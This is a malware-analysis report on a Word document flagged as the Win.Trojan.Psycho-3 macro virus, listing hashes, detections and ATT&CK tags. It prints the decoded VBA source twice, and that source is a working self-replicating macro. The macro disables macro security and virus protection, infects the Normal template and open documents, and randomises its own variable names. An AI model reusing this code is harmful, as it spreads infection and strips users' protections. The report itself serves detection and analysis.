Win.Trojan.Psycho-3 Office (OLE) malware analysis — malicious · 51e4aa0fec26bf4d

MALICIOUS

Office (OLE)

39.0 KB Created: 2000-07-04 22:55:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: ebcafd95d3c699daab4c373c370686f1 SHA-1: 3a50d2b18c2b40406d50f205163a5e11e8a2437e SHA-256: 51e4aa0fec26bf4d59dc0a221e83053b36bd8011396f95ea409636a845db3db8

120 Risk Score

Malware Insights

Win.Trojan.Psycho-3 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script attempts to lower macro security settings and appears to be designed to download and execute a secondary payload. The ClamAV detection explicitly identifies it as Win.Trojan.Psycho-3.

Heuristics 3

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4641 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4641 bytes
SHA-256: `35fa7280c9b7ad62f70ea1ce5a645684b8735322a66bb304d50ac9c2581af464`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next mbopl1mbop = "M" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Options.VirusProtection = False Options.SaveNormalPrompt = False mbopfimbop = 1 Options.ConfirmConversions = False Set mbopNtmbop = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule mbopsembop = 2 Set mbopAdmbop = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule Set mbopTdmbop = ThisDocument.VBProject.VBComponents.Item(1).CodeModule mboptrmbop = 5 mbopl2mbop = "b" mbopfnmbop = mbopfimbop & mbopsembop & mboptrmbop For mbopiimbop = 1 To mbopTdmbop.countoflines If InStr(mbopTdmbop.lines(mbopiimbop, 1), "Private Sub Document_Open()") <> 0 Then mbopSlmbop = mbopiimbop Exit For End If Next mbopl3mbop = "o" mbopVcmbop = Trim(mbopTdmbop.lines(mbopSlmbop, mbopSlmbop + mbopfnmbop)) mboplvmbop = 97 If mbopNtmbop.countoflines > 0 Then mbopNlmbop = mbopNtmbop.lines(1, mbopNtmbop.countoflines) If InStr(mbopNlmbop, "Nt") = 0 And InStr(mbopNlmbop, "Sl") = 0 And InStr(mbopNlmbop, "Nl") = 0 And InStr(mbopNlmbop, "Ad") = 0 And InStr(mbopNlmbop, "Vc") = 0 And InStr(mbopNlmbop, "Td") = 0 Then If InStr(LCase(mbopNlmbop), "private sub document_open()") <> 0 Then For mbopimbop = 1 To mbopNtmbop.countoflines If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "private sub document_open()") <> 0 Then mbopnsmbop = mbopimbop Exit For End If Next For mbopimbop = mbopnsmbop To mbopNtmbop.countoflines If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "end sub") <> 0 Then mbopnembop = mbopimbop Exit For End If Next mbopNtmbop.deletelines mbopnsmbop, mbopnembop End If If InStr(LCase(mbopNlmbop), "option explicit") <> 0 Then For mbopimbop = 1 To mbopNtmbop.countoflines If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "option explicit") <> 0 Then mbopnsmbop = mbopimbop Exit For End If Next mbopNtmbop.deletelines mbopnsmbop, 1 End If mbopNtmbop.addfromstring mbopVcmbop mbopinmbop = True End If Else mbopNtmbop.addfromstring mbopVcmbop mbopinmbop = True End If mbophvmbop = 122 If mbopAdmbop.countoflines > 0 Then mbopAlmbop = mbopAdmbop.lines(1, mbopAdmbop.countoflines) If InStr(mbopAlmbop, "Nt") = 0 And InStr(mbopAlmbop, "Sl") = 0 And InStr(mbopAlmbop, "Nl") = 0 And InStr(mbopAlmbop, "Ad") = 0 And InStr(mbopAlmbop, "Vc") = 0 And InStr(mbopAlmbop, "Td") = 0 Then If InStr(LCase(mbopAlmbop), "private sub document_open()") <> 0 Then For mbopimbop = 1 To mbopAdmbop.countoflines If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "private sub document_open()") <> 0 Then mbopnsmbop = mbopimbop Exit For End If Next For mbopimbop = mbopnsmbop To mbopAdmbop.countoflines If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "end sub") <> 0 Then mbopnembop = mbopimbop Exit For End If Next mbopAdmbop.deletelines mbopnsmbop, mbopnembop End If If InStr(LCase(mbopAlmbop), "option explicit") <> 0 Then For mbopimbop = 1 To mbopAdmbop.countoflines If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "option explicit") <> 0 Then mbopnsmbop = mbopimbop Exit For End If Next mbopAdmbop.deletelines mbopnsmbop, 1 End If mbopAdmbop.addfromstring mbopVcmbop mbopiambop = True End If Else mbopAdmbop.addfromstring mbopVcmbop mbopiambop = True End If mbopl4mbop = "p" mbop15mbop = 15 For mbopiimbop = 1 To mbop15mbop Randomize mbopTnmbop = mbopTnmbop & Chr(Int((mbophvmbop - mboplvmbop + 1) * Rnd + mboplvmbop)) Next mbopd2mbop = 9 mbopVcmbop = mbopTdmbop.lines(1, mbopTdmbop.countoflines) mbopTdmbop.deletelines 1, mbopTdmbop.countoflines Do While InStr(mbopVcmbop, "mbop") <> 0 mbopVcmbop = Mid(mbopVcmbop, 1, InStr(mbopVcmbop, "mbop") - 1) & mbopTnmbop & Mid(mbopVcmbop, InStr(mbopVcmbop, "mbop") + Len("mbop")) Loop mbopTdmbop.addfromstring mbop ... (truncated)

SHA-256: 35fa7280c9b7ad62f70ea1ce5a645684b8735322a66bb304d50ac9c2581af464

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
mbopl1mbop = "M"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.VirusProtection = False
Options.SaveNormalPrompt = False
mbopfimbop = 1
Options.ConfirmConversions = False
Set mbopNtmbop = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
mbopsembop = 2
Set mbopAdmbop = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set mbopTdmbop = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
mboptrmbop = 5
mbopl2mbop = "b"
mbopfnmbop = mbopfimbop & mbopsembop & mboptrmbop
For mbopiimbop = 1 To mbopTdmbop.countoflines
If InStr(mbopTdmbop.lines(mbopiimbop, 1), "Private Sub Document_Open()") <> 0 Then
mbopSlmbop = mbopiimbop
Exit For
End If
Next
mbopl3mbop = "o"
mbopVcmbop = Trim(mbopTdmbop.lines(mbopSlmbop, mbopSlmbop + mbopfnmbop))
mboplvmbop = 97
If mbopNtmbop.countoflines > 0 Then
mbopNlmbop = mbopNtmbop.lines(1, mbopNtmbop.countoflines)
If InStr(mbopNlmbop, "Nt") = 0 And InStr(mbopNlmbop, "Sl") = 0 And InStr(mbopNlmbop, "Nl") = 0 And InStr(mbopNlmbop, "Ad") = 0 And InStr(mbopNlmbop, "Vc") = 0 And InStr(mbopNlmbop, "Td") = 0 Then
If InStr(LCase(mbopNlmbop), "private sub document_open()") <> 0 Then
For mbopimbop = 1 To mbopNtmbop.countoflines
If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "private sub document_open()") <> 0 Then
mbopnsmbop = mbopimbop
Exit For
End If
Next
For mbopimbop = mbopnsmbop To mbopNtmbop.countoflines
If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "end sub") <> 0 Then
mbopnembop = mbopimbop
Exit For
End If
Next
mbopNtmbop.deletelines mbopnsmbop, mbopnembop
End If
If InStr(LCase(mbopNlmbop), "option explicit") <> 0 Then
For mbopimbop = 1 To mbopNtmbop.countoflines
If InStr(LCase(mbopNtmbop.lines(mbopimbop, 1)), "option explicit") <> 0 Then
mbopnsmbop = mbopimbop
Exit For
End If
Next
mbopNtmbop.deletelines mbopnsmbop, 1
End If
mbopNtmbop.addfromstring mbopVcmbop
mbopinmbop = True
End If
Else
mbopNtmbop.addfromstring mbopVcmbop
mbopinmbop = True
End If
mbophvmbop = 122
If mbopAdmbop.countoflines > 0 Then
mbopAlmbop = mbopAdmbop.lines(1, mbopAdmbop.countoflines)
If InStr(mbopAlmbop, "Nt") = 0 And InStr(mbopAlmbop, "Sl") = 0 And InStr(mbopAlmbop, "Nl") = 0 And InStr(mbopAlmbop, "Ad") = 0 And InStr(mbopAlmbop, "Vc") = 0 And InStr(mbopAlmbop, "Td") = 0 Then
If InStr(LCase(mbopAlmbop), "private sub document_open()") <> 0 Then
For mbopimbop = 1 To mbopAdmbop.countoflines
If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "private sub document_open()") <> 0 Then
mbopnsmbop = mbopimbop
Exit For
End If
Next
For mbopimbop = mbopnsmbop To mbopAdmbop.countoflines
If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "end sub") <> 0 Then
mbopnembop = mbopimbop
Exit For
End If
Next
mbopAdmbop.deletelines mbopnsmbop, mbopnembop
End If
If InStr(LCase(mbopAlmbop), "option explicit") <> 0 Then
For mbopimbop = 1 To mbopAdmbop.countoflines
If InStr(LCase(mbopAdmbop.lines(mbopimbop, 1)), "option explicit") <> 0 Then
mbopnsmbop = mbopimbop
Exit For
End If
Next
mbopAdmbop.deletelines mbopnsmbop, 1
End If
mbopAdmbop.addfromstring mbopVcmbop
mbopiambop = True
End If
Else
mbopAdmbop.addfromstring mbopVcmbop
mbopiambop = True
End If
mbopl4mbop = "p"
mbop15mbop = 15
For mbopiimbop = 1 To mbop15mbop
Randomize
mbopTnmbop = mbopTnmbop & Chr(Int((mbophvmbop - mboplvmbop + 1) * Rnd + mboplvmbop))
Next
mbopd2mbop = 9
mbopVcmbop = mbopTdmbop.lines(1, mbopTdmbop.countoflines)
mbopTdmbop.deletelines 1, mbopTdmbop.countoflines
Do While InStr(mbopVcmbop, "mbop") <> 0
mbopVcmbop = Mid(mbopVcmbop, 1, InStr(mbopVcmbop, "mbop") - 1) & mbopTnmbop & Mid(mbopVcmbop, InStr(mbopVcmbop, "mbop") + Len("mbop"))
Loop
mbopTdmbop.addfromstring mbop
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.